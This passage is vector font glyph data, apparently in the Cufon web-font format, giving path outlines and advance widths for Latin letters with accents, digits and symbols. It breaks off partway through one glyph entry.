{"d":"82,-117r0,-31v27,1,56,-8,56,-39v0,-21,-16,-36,-39,-36v-28,0,-43,26,-42,52r-41,0v2,-49,32,-86,83,-86v39,0,80,22,80,67v1,26,-14,44,-36,55v28,6,46,31,46,63v0,48,-41,77,-89,77v-58,0,-88,-35,-89,-88r41,0v-1,31,16,54,48,54v27,0,48,-16,48,-45v0,-39,-34,-44,-66,-43"},{"d":"20,-218r0,-39r195,0r0,34r-149,184r153,0r0,39r-211,0r0,-37r150,-181r-138,0xm91,-271r33,-39r51,0r-52,39r-32,0","w":226},{"d":"25,0r0,-49r50,0v4,55,-3,98,-49,106r0,-22v16,-4,24,-20,24,-35r-25,0","w":100},{"d":"103,69r-34,0v-63,-88,-70,-237,0,-332r34,0v-58,99,-59,233,0,332","w":100},{"d":"188,-124r-41,0v-3,-23,-19,-35,-42,-35v-21,0,-51,11,-51,68v0,31,13,64,49,64v24,0,40,-16,44,-43r41,0v-8,48,-37,75,-85,75v-58,0,-90,-41,-90,-96v0,-56,30,-100,91,-100v43,0,80,21,84,67xm82,-212r32,-51r49,0r-51,51r-30,0"},{"d":"22,0r0,-186r38,0v1,11,-2,27,1,36v6,-24,36,-47,70,-40r0,40v-41,-9,-68,13,-68,61r0,89r-41,0xm51,-212r32,-51r49,0r-51,51r-30,0","w":126},{"d":"199,-146r0,37r-182,0r0,-37r182,0xm199,-73r0,37r-182,0r0,-37r182,0","w":216},{"d":"272,-35r0,35r-31,0r0,-35r-70,0r0,-29r66,-90r35,0r0,92r17,0r0,27r-17,0xm241,-62v-1,-18,2,-41,-1,-57r-42,57r43,0xm71,9r150,-270r28,0r-150,270r-28,0xm53,-171r0,-21v18,1,36,-5,36,-22v-7,-30,-55,-19,-51,10r-29,0v1,-33,22,-53,55,-53v27,0,54,11,54,42v1,16,-10,26,-23,33v18,3,29,18,29,38v0,32,-26,49,-59,49v-39,0,-58,-21,-59,-56r29,0v-1,17,10,31,30,31v17,0,30,-10,30,-26v0,-23,-21,-26,-42,-25","w":300},{"d":"22,0r0,-186r38,0v1,9,-2,21,1,28v27,-52,124,-42,124,30r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0xm84,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":206},{"d":"15,-154r0,-32r151,0r0,29r-106,125r112,0r0,32r-164,0r0,-29r103,-125r-96,0xm149,-263r-39,51r-40,0r-39,-51r33,0r26,32r25,-32r34,0","w":180},{"d":"103,-32v67,0,69,-128,0,-127v-67,1,-66,127,0,127xm194,-186r0,176v0,56,-33,84,-92,84v-37,0,-79,-14,-83,-58r41,0v5,23,24,27,45,27v44,0,53,-34,47,-76v-12,21,-33,33,-56,33v-59,0,-83,-45,-83,-98v0,-77,97,-128,140,-63r0,-25r41,0xm49,-263r20,0v6,37,69,36,75,0r21,0v-4,34,-27,51,-60,51v-33,0,-53,-18,-56,-51","w":213},{"d":"185,-186r0,186r-7,0v-26,20,-33,33,-33,45v0,20,24,19,34,4r14,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,0,-23,39,-46r-13,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0","w":206},{"d":"64,0r-41,0r0,-186r41,0r0,186xm25,-212r33,-51r48,0r-51,51r-30,0","w":86},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm102,-198v-20,0,-38,-17,-38,-37v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,37,-37,37xm80,-235v0,12,10,22,22,22v12,0,21,-10,21,-22v0,-12,-9,-22,-21,-22v-12,0,-22,10,-22,22"},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm86,-212r33,-51r48,0r-51,51r-30,0","w":206},{"d":"259,-35r0,35r-31,0r0,-35r-71,0r0,-29r67,-90r35,0r0,92r17,0r0,27r-17,0xm228,-62v-1,-18,2,-41,-1,-57r-42,57r43,0xm13,-208r0,-21v24,0,46,-7,50,-25r25,0r0,156r-31,0r0,-110r-44,0xm51,9r151,-270r28,0r-151,270r-28,0","w":300},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm48,-211r38,-52r40,0r39,52r-33,0r-25,-32r-26,32r-33,0","w":213},{"d":"73,-257r0,21v-14,5,-22,17,-22,32r22,0r0,48r-45,0v-4,-52,2,-92,45,-101","w":100},{"d":"61,-120v6,60,15,117,12,186r-45,0v-2,-68,5,-127,12,-186r21,0xm74,-191r0,45r-48,0r0,-45r48,0","w":100},{"d":"22,0r0,-186r38,0v1,9,-2,21,1,28v27,-52,124,-42,124,30r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0xm79,-255v28,0,58,32,69,-2r20,0v-4,23,-13,40,-39,41v-22,1,-60,-30,-67,2r-21,0v3,-18,16,-41,38,-41","w":206},{"d":"27,0r0,-257r45,0r0,257r-45,0xm100,-276r-103,0r0,-23r103,0r0,23","w":100},{"d":"26,0r0,-257r47,0r118,189r0,-189r43,0r0,257r-48,0r-118,-189r0,189r-42,0xm109,-312v28,0,58,30,70,-3r20,0v-4,23,-13,42,-40,42v-21,1,-60,-31,-67,1r-20,0v3,-18,15,-40,37,-40","w":259},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm143,-309r41,0r0,39r-41,0r0,-39xm115,-270r-41,0r0,-39r41,0r0,39","w":259},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm69,-271r33,-39r48,0r-51,39r-30,0xm148,-271r32,-39r49,0r-52,39r-29,0","w":259},{"d":"22,0r0,-186r38,0v1,9,-2,21,1,28v27,-52,124,-42,124,30r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0xm85,-212r33,-51r48,0r-51,51r-30,0","w":206},{"d":"72,-117r0,80v51,-3,123,15,123,-40v0,-54,-72,-38,-123,-40xm27,0r0,-257v83,4,202,-23,202,64v0,27,-16,43,-37,55v31,7,48,31,48,66v0,40,-28,72,-95,72r-118,0xm72,-220r0,71v47,-3,112,14,112,-36v0,-53,-67,-30,-112,-35","w":253},{"d":"199,-34r0,37r-182,-81r0,-26r182,-81r0,37r-134,57","w":216},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm158,-223r-104,0r0,-23r104,0r0,23","w":206},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm87,-212r32,-51r49,0r-51,51r-30,0","w":213},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm45,-211r39,-52r40,0r39,52r-33,0r-26,-32r-25,32r-34,0","w":206},{"d":"13,-208r0,-21v24,0,46,-7,50,-25r25,0r0,156r-31,0r0,-110r-44,0","w":129},{"d":"23,0r0,-257r41,0r0,257r-41,0xm30,-271r33,-39r50,0r-51,39r-32,0","w":86},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm159,-223r-104,0r0,-23r104,0r0,23","w":213},{"d":"88,-193v-13,9,-51,2,-51,23v0,21,53,15,51,-7r0,-16xm119,-224r0,55v0,8,4,9,12,7r0,25v-17,5,-38,5,-39,-15v-19,26,-86,25,-86,-16v0,-28,25,-32,48,-36v19,-3,34,-4,34,-13v-1,-26,-46,-21,-47,-2r-31,0v3,-30,31,-38,58,-38v25,0,51,9,51,33","w":136},{"d":"25,0r0,-49r50,0v4,55,-3,98,-49,106r0,-22v16,-4,24,-20,24,-35r-25,0xm25,-134r0,-48r50,0r0,48r-50,0","w":100},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-47,0v-26,20,-32,33,-32,45v0,20,24,20,33,4r15,2v-6,21,-24,27,-38,27v-7,0,-37,-2,-37,-32v0,-6,1,-23,40,-46r-122,0","w":226},{"d":"27,-32r-20,-21r21,-22v-24,-24,-24,-78,0,-102r-21,-22r21,-21r20,20v24,-20,79,-22,102,0r21,-21r22,22r-20,21v23,25,22,79,-1,104r20,21r-20,20r-20,-21v-24,24,-79,24,-104,1xm100,-72v29,0,51,-25,51,-54v0,-28,-21,-54,-50,-54v-30,0,-52,24,-52,54v0,30,22,54,51,54"},{"d":"27,0r0,-114r-24,0r0,-37r24,0r0,-106r107,0v79,0,113,57,113,128v0,71,-34,129,-113,129r-107,0xm72,-220r0,69r71,0r0,37r-71,0r0,77r45,0v71,0,85,-41,85,-92v0,-51,-14,-91,-85,-91r-45,0","w":259},{"d":"23,0r0,-257r41,0r0,146r74,-75r50,0r-71,68r78,118r-50,0r-57,-90r-24,23r0,67r-41,0xm82,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":193},{"d":"20,-218r0,-39r195,0r0,34r-149,184r153,0r0,39r-211,0r0,-37r150,-181r-138,0xm180,-310r-39,38r-44,0r-39,-38r36,0r25,21r25,-21r36,0","w":226},{"d":"107,-27v72,-1,71,-131,0,-132v-72,1,-71,131,0,132xm107,5v-60,0,-94,-41,-94,-98v0,-57,34,-98,94,-98v60,0,94,41,94,98v0,57,-34,98,-94,98xm54,-263r48,0r33,51r-30,0","w":213},{"d":"188,-92r0,32r-32,0r0,60r-39,0r0,-60r-108,0r0,-40r108,-152r39,0r0,160r32,0xm117,-203v-28,35,-51,75,-77,111r77,0r0,-111"},{"d":"12,-60r41,0v2,24,20,33,42,33v15,0,42,-4,41,-25v-1,-22,-31,-24,-61,-31v-30,-6,-60,-17,-60,-55v0,-76,151,-71,156,4r-43,0v-4,-19,-20,-25,-38,-25v-12,0,-33,3,-33,19v0,20,30,23,60,30v30,7,60,18,60,55v0,44,-44,60,-83,60v-47,0,-81,-21,-82,-65xm151,-263r-39,51r-40,0r-38,-51r33,0r25,32r26,-32r33,0","w":186},{"d":"13,-215r0,-37r172,0r0,34v-53,59,-88,127,-94,218r-45,0v5,-80,45,-157,97,-215r-130,0"},{"d":"186,-180v0,75,-103,96,-123,143r123,0r0,37r-172,0v0,-41,21,-71,55,-95v33,-23,75,-44,76,-83v0,-18,-7,-45,-42,-45v-32,0,-42,28,-43,63r-41,0v0,-56,30,-97,86,-97v62,0,81,45,81,77"},{"d":"70,-122v23,0,56,24,77,25v14,0,23,-14,31,-25r13,31v-11,15,-23,31,-45,31v-36,0,-90,-50,-108,0r-13,-31v8,-15,21,-31,45,-31","w":216},{"d":"81,-263r0,332r-81,0r0,-33r42,0r0,-267r-42,0r0,-32r81,0","w":106},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm59,-271r39,-39r44,0r38,39r-35,0r-25,-22r-26,22r-35,0","w":240},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm62,-316r21,0v6,34,69,33,75,0r20,0v-4,30,-27,46,-60,46v-33,0,-53,-16,-56,-46","w":240},{"d":"185,-186r0,186r-40,0v-1,-8,2,-20,-1,-26v-30,54,-122,36,-122,-42r0,-118r41,0r0,114v0,33,13,45,35,45v72,-1,39,-96,46,-159r41,0xm44,-212r33,-51r49,0r-52,51r-30,0xm123,-212r33,-51r48,0r-51,51r-30,0","w":206},{"d":"103,-32v67,0,69,-128,0,-127v-67,1,-66,127,0,127xm194,-186r0,176v0,56,-33,84,-92,84v-37,0,-79,-14,-83,-58r41,0v5,23,24,27,45,27v44,0,53,-34,47,-76v-12,21,-33,33,-56,33v-59,0,-83,-45,-83,-98v0,-77,97,-128,140,-63r0,-25r41,0xm129,-248r0,36r-38,0v-3,-41,3,-73,37,-79r0,17v-12,3,-17,14,-17,26r18,0","w":213},{"d":"26,0r0,-257r47,0r118,189r0,-189r43,0r0,257r-48,0r-118,-189r0,189r-42,0","w":259},{"d":"18,1v-1,-68,65,-53,63,-121r39,0v0,42,-9,57,-28,74v-15,13,-29,22,-29,46v0,27,22,38,35,38v30,0,43,-21,43,-52r42,0v0,51,-34,86,-87,86v-44,0,-78,-26,-78,-71xm76,-191r48,0r0,45r-48,0r0,-45"},{"d":"103,-29v30,0,44,-26,44,-53v0,-27,-14,-51,-44,-51v-30,0,-46,23,-46,51v0,27,16,53,46,53xm183,-188r-41,0v-2,-21,-16,-35,-37,-35v-44,-1,-51,56,-51,87v37,-62,134,-19,134,55v0,49,-34,86,-84,86v-74,0,-92,-59,-92,-132v0,-60,24,-130,95,-130v40,0,74,28,76,69"},{"d":"-10,-263r48,0r33,51r-30,0","w":86},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm160,-271r-33,-39r-50,0r51,39r32,0","w":259},{"d":"23,0r0,-257r41,0r0,257r-41,0xm82,-221r0,-36r38,0v3,41,-3,73,-37,79r0,-16v12,-3,17,-15,17,-27r-18,0","w":104},{"d":"22,0r0,-257r41,0r0,95v26,-47,122,-37,122,34r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0","w":206},{"d":"199,-14v-43,48,-118,-14,-167,20r-19,-29v27,-18,52,-56,31,-92r-33,0r0,-23r23,0v-43,-52,2,-125,67,-125v55,0,91,30,91,89r-42,0v-1,-31,-13,-55,-48,-55v-45,0,-48,62,-24,91r53,0r0,23r-44,0v18,34,-7,66,-30,84v40,-29,90,25,124,-11"},{"d":"23,0r0,-257r41,0r0,257r-41,0xm25,50r0,-37r37,0v3,41,-1,74,-36,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":86},{"d":"27,0r0,-257r45,0r0,218r131,0r0,39r-176,0","w":206},{"d":"26,0r0,-257r45,0r0,102r117,0r0,-102r45,0r0,257r-45,0r0,-116r-117,0r0,116r-45,0","w":259},{"d":"22,0r0,-186r38,0v1,11,-2,27,1,36v6,-24,36,-47,70,-40r0,40v-41,-9,-68,13,-68,61r0,89r-41,0xm24,50r0,-37r37,0v3,41,-1,74,-36,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":126},{"d":"3,72r7,-14v15,6,45,11,45,-9v0,-15,-20,-17,-31,-10r-7,-7r23,-32r18,0v-5,8,-13,13,-17,22v20,-4,43,3,43,25v0,38,-53,38,-81,25","w":86},{"d":"94,0r0,-101r-96,-156r52,0r68,115r67,-115r50,0r-96,156r0,101r-45,0xm132,-309r41,0r0,39r-41,0r0,-39xm104,-270r-41,0r0,-39r41,0r0,39","w":233},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm50,-263r49,0r32,51r-29,0"},{"d":"84,0r-86,-257r47,0r65,203r66,-203r46,0r-88,257r-50,0","w":219},{"d":"54,-93v0,32,14,66,51,66v36,0,52,-27,52,-66v0,-40,-18,-66,-52,-66v-34,0,-51,32,-51,66xm197,-186r0,255r-41,0r-1,-93v-13,21,-38,29,-62,29v-55,0,-80,-47,-80,-97v0,-54,28,-99,87,-99v25,-1,44,11,58,30r0,-25r39,0","w":219},{"d":"53,-171r0,-21v18,1,36,-5,36,-22v-7,-30,-55,-19,-51,10r-29,0v1,-33,22,-53,55,-53v27,0,54,11,54,42v1,16,-10,26,-23,33v18,3,29,18,29,38v0,32,-26,49,-59,49v-39,0,-58,-21,-59,-56r29,0v-1,17,10,31,30,31v17,0,30,-10,30,-26v0,-23,-21,-26,-42,-25","w":129},{"d":"96,-27r0,-132v-58,9,-57,122,0,132xm96,37r0,-32v-52,0,-83,-44,-83,-96v0,-60,34,-100,83,-100r0,-33r16,0r0,33v40,0,74,25,77,67r-41,0v-3,-21,-17,-35,-36,-35r0,132v22,-4,34,-19,37,-43r41,0v-8,45,-33,75,-78,75r0,32r-16,0"},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm154,-223r-104,0r0,-23r104,0r0,23"},{"d":"22,0r0,-186r38,0v1,9,-2,21,1,28v27,-52,124,-42,124,30r0,128r-41,0r0,-117v-1,-29,-12,-42,-36,-42v-65,2,-41,96,-45,159r-41,0","w":206},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97xm188,-276r-103,0r0,-23r103,0r0,23","w":273},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm154,-223r-104,0r0,-23r104,0r0,23"},{"d":"27,0r0,-257r185,0r0,39r-140,0r0,67r130,0r0,37r-130,0r0,75r143,0r0,39r-188,0xm62,-271r39,-39r44,0r39,39r-36,0r-25,-22r-25,22r-36,0","w":226},{"d":"219,-204r-22,0r0,204r-39,0v-1,-8,2,-19,-1,-25v-11,21,-34,30,-57,30v-59,0,-87,-43,-87,-99v-2,-100,92,-123,143,-68r0,-42r-66,0r0,-30r66,0r0,-23r41,0r0,23r22,0r0,30xm106,-159v-71,1,-70,131,-1,132v37,0,52,-34,52,-66v0,-41,-19,-66,-51,-66","w":219},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm162,-263r-39,51r-40,0r-39,-51r33,0r26,32r25,-32r34,0"},{"d":"137,-263v77,0,123,61,123,134v0,73,-46,135,-123,135v-77,0,-123,-62,-123,-135v0,-73,46,-134,123,-134xm137,-226v-55,0,-78,48,-78,97v0,49,23,98,78,98v55,0,78,-49,78,-98v0,-49,-23,-97,-78,-97","w":273},{"d":"27,0r0,-257r45,0r0,218r131,0r0,39r-176,0xm95,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":206},{"d":"80,0r0,-59r-50,0r0,-24r50,0r0,-24r-50,0r0,-24r36,0r-68,-126r46,0r56,115r57,-115r45,0r-68,126r36,0r0,24r-49,0r0,24r49,0r0,24r-49,0r0,59r-41,0"},{"d":"72,-220r0,80v50,-2,120,14,118,-41v-2,-60,-68,-33,-118,-39xm27,0r0,-257r123,0v56,0,85,25,85,69v0,50,-35,60,-42,66v15,2,38,13,38,54v0,30,4,58,14,68r-48,0v-15,-44,4,-106,-58,-106r-67,0r0,106r-45,0xm107,50r0,-37r38,0v3,41,-2,74,-37,79r0,-16v12,-3,18,-14,18,-26r-19,0","w":253},{"d":"94,9r140,-270r27,0r-139,270r-28,0xm270,5v-44,0,-60,-33,-60,-72v0,-39,18,-71,60,-71v42,0,60,32,60,71v0,39,-16,72,-60,72xm243,-67v0,27,7,49,27,49v20,0,28,-22,28,-49v0,-24,-6,-48,-28,-48v-22,0,-27,24,-27,48xm90,-114v-44,0,-60,-32,-60,-71v0,-39,18,-72,60,-72v42,0,60,33,60,72v0,39,-16,71,-60,71xm62,-185v0,27,7,48,27,48v20,0,28,-21,28,-48v0,-24,-6,-49,-28,-49v-22,0,-27,25,-27,49","w":360},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm118,-255r41,0r0,39r-41,0r0,-39xm90,-216r-41,0r0,-39r41,0r0,39"},{"d":"87,-155v29,0,50,-10,50,-39v0,-24,-12,-37,-36,-37v-17,0,-37,9,-37,47r0,184r-41,0r0,-188v0,-47,33,-75,79,-75v39,0,76,24,76,65v1,25,-14,45,-37,55v30,4,49,32,49,61v0,57,-40,95,-103,86r0,-32v45,9,62,-28,62,-56v0,-33,-31,-44,-62,-44r0,-27","w":206},{"d":"166,-37r-26,-22r21,-25r32,27v42,-55,27,-169,-56,-169v-55,0,-78,48,-78,97v0,59,42,117,107,92xm224,-30r33,29r-22,24r-38,-32v-91,48,-183,-25,-183,-120v0,-73,46,-134,123,-134v118,0,160,156,87,233","w":273},{"d":"12,-86r45,0v0,40,29,55,65,55v62,0,67,-56,33,-70v-18,-8,-42,-11,-77,-21v-44,-12,-56,-39,-56,-66v0,-51,48,-75,94,-75v54,0,98,28,98,82r-45,0v-2,-33,-24,-45,-55,-45v-21,0,-47,7,-47,33v0,44,65,38,104,53v33,12,50,38,50,65v0,58,-51,81,-102,81v-59,0,-106,-28,-107,-92xm177,-310r-39,39r-44,0r-39,-39r36,0r25,22r25,-22r36,0","w":233},{"d":"64,0r-41,0r0,-186r41,0r0,186","w":86},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54"},{"d":"190,-82r-136,0v-9,54,81,78,95,24r39,0v-9,41,-43,63,-84,63v-58,0,-91,-41,-91,-98v0,-53,35,-98,90,-98v59,0,94,53,87,109xm54,-109r95,0v-1,-26,-18,-50,-46,-50v-28,0,-48,22,-49,50xm50,-263r48,0r33,51r-30,0"},{"d":"22,0r0,-186r38,0v1,11,-2,27,1,36v6,-24,36,-47,70,-40r0,40v-41,-9,-68,13,-68,61r0,89r-41,0","w":126},{"d":"67,72r7,-14v15,6,45,11,45,-9v0,-15,-20,-18,-30,-10r-8,-7r19,-27v-50,-5,-87,-34,-88,-91r45,0v0,40,29,55,65,55v62,0,67,-56,33,-70v-18,-8,-42,-11,-77,-21v-44,-12,-56,-39,-56,-66v0,-51,48,-75,94,-75v54,0,98,28,98,82r-45,0v-2,-33,-24,-45,-55,-45v-21,0,-47,7,-47,33v0,44,65,38,104,53v33,12,50,38,50,65v0,59,-51,81,-104,81v-4,6,-9,10,-12,16v20,-4,43,3,43,25v0,38,-53,38,-81,25","w":233},{"d":"-3,0r99,-257r48,0r99,257r-48,0r-24,-68r-103,0r-24,68r-47,0xm120,-213v-16,35,-26,75,-40,111r79,0xm133,-309r41,0r0,39r-41,0r0,-39xm105,-270r-41,0r0,-39r41,0r0,39","w":240},{"d":"3,-156r0,-30r31,0r0,-56r41,0r0,56r37,0r0,30r-37,0r0,100v-4,25,15,27,37,24r0,32v-44,8,-78,-4,-78,-46r0,-110r-31,0xm46,50r0,-37r37,0v3,41,-1,74,-36,79r0,-16v12,-3,17,-14,17,-26r-18,0","w":119},{"d":"95,-223r-103,0r0,-23r103,0r0,23","w":86},{"d":"24,-93r0,-164r45,0r0,150v0,35,3,74,61,74v58,0,60,-39,60,-74r0,-150r45,0r0,164v0,66,-42,99,-105,99v-63,0,-106,-33,-106,-99xm185,-276r-104,0r0,-23r104,0r0,23","w":259},{"d":"82,-91r-62,-63r31,-20r57,57r57,-57r31,20r-63,63r63,63r-31,20r-57,-58r-57,58r-31,-20","w":216},{"d":"16,-212r33,-51r48,0r-51,51r-30,0","w":86},{"d":"12,-86r45,0v0,40,29,55,65,55v62,0,67,-56,33,-70v-18,-8,-42,-11,-77,-21v-44,-12,-56,-39,-56,-66v0,-51,48,-75,94,-75v54,0,98,28,98,82r-45,0v-2,-33,-24,-45,-55,-45v-21,0,-47,7,-47,33v0,44,65,38,104,53v33,12,50,38,50,65v0,58,-51,81,-102,81v-59,0,-106,-28,-107,-92xm94,-271r32,-39r51,0r-51,39r-32,0","w":233},{"d":"152,-130r-81,88v9,9,21,15,36,15v50,-1,64,-62,45,-103xm23,10r-11,-10r23,-26v-47,-58,-17,-165,72,-165v25,0,46,7,61,20r23,-25r11,10r-23,25v46,59,17,166,-72,166v-25,0,-46,-7,-61,-20xm62,-56r81,-88v-9,-9,-21,-15,-36,-15v-50,1,-64,62,-45,103","w":213},{"d":"27,0r0,-257r178,0r0,39r-133,0r0,67r117,0r0,37r-117,0r0,114r-45,0","w":213},{"d":"67,-121r-37,0r65,-131r26,0r65,131r-37,0r-41,-89","w":216},{"d":"90,-133r-85,-124r54,0r58,91r61,-91r50,0r-85,124r91,133r-54,0r-64,-98r-66,98r-51,0","w":233},{"d":"27,0r0,-257r45,0r0,257r-45,0xm-11,-271r39,-39r44,0r39,39r-36,0r-25,-22r-26,22r-35,0","w":100},{"d":"94,0r0,-101r-96,-156r52,0r68,115r67,-115r50,0r-96,156r0,101r-45,0","w":233},{"d":"23,0r0,-257r41,0r0,257r-41,0","w":86},{"d":"3,-156r0,-30r31,0v-5,-64,29,-80,80,-69r0,33v-15,-4,-40,-7,-39,17r0,19r35,0r0,30r-35,0r0,156r-41,0r0,-156r-31,0","w":113},{"d":"318,-82r-136,0v-10,58,81,76,93,23r41,0v-11,68,-115,90,-151,30v-14,26,-39,34,-67,34v-58,0,-85,-46,-85,-99v0,-53,32,-97,89,-97v26,0,52,7,65,31v14,-22,39,-31,65,-31v65,0,86,51,86,109xm229,-159v-28,0,-46,24,-47,50r95,0v-2,-30,-17,-50,-48,-50xm101,-159v-35,0,-47,35,-47,65v0,32,9,67,47,67v68,0,64,-132,0,-132","w":326},{"d":"80,-70v-8,-73,58,-66,58,-119v0,-29,-23,-40,-36,-40v-30,0,-43,22,-43,54r-41,0v0,-53,33,-88,86,-88v44,0,79,27,79,73v0,67,-66,52,-64,120r-39,0xm75,0r0,-45r48,0r0,45r-48,0"},{"d":"27,0r0,-257r45,0r0,257r-6,0v-26,20,-33,33,-33,45v0,20,25,20,34,4r14,2v-6,21,-24,27,-38,27v-7,0,-36,-2,-36,-32v0,-6,0,-23,39,-46r-19,0","w":100},{"d":"32,-156r0,-101r36,0r0,101r-36,0","w":100},{"d":"130,-78v28,0,49,-38,49,-64v0,-17,-13,-32,-28,-32v-30,0,-50,36,-50,63v0,19,11,33,29,33xm221,-195r-26,95v-4,11,-6,24,4,24v22,0,47,-33,47,-77v0,-54,-43,-87,-96,-87v-61,0,-104,48,-104,108v0,109,126,150,188,79r25,0v-62,106,-241,57,-241,-80v0,-73,60,-130,132,-130v64,0,120,43,120,105v0,72,-56,108,-85,108v-12,0,-19,-9,-22,-21v-29,38,-92,16,-92,-36v0,-64,79,-133,119,-68r6,-20r25,0","w":288},{"d":"72,-220r0,80v50,-2,120,14,118,-41v-2,-60,-68,-33,-118,-39xm27,0r0,-257r123,0v56,0,85,25,85,69v0,50,-35,60,-42,66v15,2,38,13,38,54v0,30,4,58,14,68r-48,0v-15,-44,4,-106,-58,-106r-67,0r0,106r-45,0xm98,-271r32,-39r51,0r-51,39r-32,0","w":253},{"d":"30,-156r0,-101r37,0r0,101r-37,0xm93,-156r0,-101r37,0r0,101r-37,0","w":159},{"d":"27,0r0,-257r45,0r0,257r-45,0xm64,-309r41,0r0,39r-41,0r0,-39xm36,-270r-41,0r0,-39r41,0r0,39","w":100},{"d":"136,-93v-26,16,-83,-1,-83,42v9,39,81,30,83,-12r0,-30xm177,-137r0,96v-1,15,8,15,20,13r0,28v-22,7,-54,9,-57,-18v-37,36,-127,33,-128,-31v0,-46,36,-53,71,-58v30,-4,56,-3,56,-27v0,-40,-81,-31,-80,5r-41,0v3,-48,44,-62,85,-62v36,0,74,15,74,54xm76,-255v28,-1,58,32,70,-2r20,0v-4,23,-14,40,-40,41v-23,1,-59,-30,-67,2r-20,0v3,-18,15,-41,37,-41"},{"d":"23,0r0,-186r41,0r0,186r-41,0xm23,-218r0,-39r41,0r0,39r-41,0","w":86},{"d":"276,-129v0,81,-61,135,-132,135v-77,0,-132,-58,-132,-135v0,-